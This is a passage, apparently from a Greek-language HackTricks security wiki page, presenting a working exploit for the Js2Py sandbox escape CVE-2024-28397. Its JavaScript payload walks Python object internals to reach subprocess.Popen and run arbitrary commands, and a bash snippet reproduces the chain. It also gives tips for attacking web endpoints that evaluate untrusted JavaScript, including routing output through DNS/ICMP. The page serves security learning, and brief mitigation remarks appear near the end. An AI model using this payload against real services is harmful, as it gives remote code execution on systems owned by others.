hacked = Object.getOwnPropertyNames({}); // -> dict_keys([]) bymarve = hacked.getattribute; n11 = bymarve(“getattribute”); // attribute access primitive obj = n11(“class”).base; // pivot to <class ‘object’> getattr = obj.getattribute;

function findpopen(o) { let result; for (let i in o.subclasses()) { let item = o.subclasses()[i]; if (item.module == “subprocess” && item.name == “Popen”) { return item; } if (item.name != “type” && (result = findpopen(item))) { return result; } } }

// Popen(cmd, stdin/out/err pipes…) then .communicate() for output n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate(); console.log(n11); n11; // returned to caller if framework sends eval_js result back

</details>

Γιατί αυτό λειτουργεί: Το Js2Py εκθέτει περιτυλίγματα αντικειμένων Python στο JS χωρίς να αφαιρεί τα `__getattribute__`, `__class__`, `__base__`, ή `__subclasses__`. Η `disable_pyimport()` μπλοκάρει μόνο ρητά το `pyimport`, αλλά η παραπάνω αλυσίδα δεν εισάγει ποτέ κάτι καινούριο· επαναχρησιμοποιεί ήδη φορτωμένα modules και classes στη μνήμη.

## Τοπική αναπαραγωγή της αλυσίδας
```bash
# Js2Py 0.74 breaks on Python 3.12/3.13; pin 3.11 for testing
uv run --with js2py==0.74 --python 3.11 python - <<'PY'
import js2py
print(js2py.eval_js("Object.getOwnPropertyNames({})"))                      # dict_keys([])
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__"))    # method-wrapper
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\")"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__.__subclasses__()"))
PY

Ενέργειες εναντίον web sandboxes

• Οποιοδήποτε endpoint που τροφοδοτεί JavaScript ελεγχόμενο από τον επιτιθέμενο στο js2py.eval_js (για παράδειγμα, ένα Flask /run_code API) αποτελεί άμεσο RCE εάν ο χρήστης της διεργασίας έχει πρόσβαση σε shell.
• Η επιστροφή του jsonify({'result': result}) θα αποτύχει όταν .communicate() επιστρέφει bytes· αποκωδικοποιήστε ή κατευθύνετε την έξοδο σε DNS/ICMP για να αποφύγετε εμπόδια σειριοποίησης.
• disable_pyimport() δεν μετριάζει αυτήν την αλυσίδα· απαιτείται σκληρή απομόνωση (ξεχωριστή διεργασία/container) ή η κατάργηση της εκτέλεσης μη αξιόπιστου κώδικα από Js2Py.

Αναφορές

• HTB: CodeTwo write-up (Js2Py CVE-2024-28397 escape)
• Marven11 CVE-2024-28397 Js2Py sandbox escape PoC

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.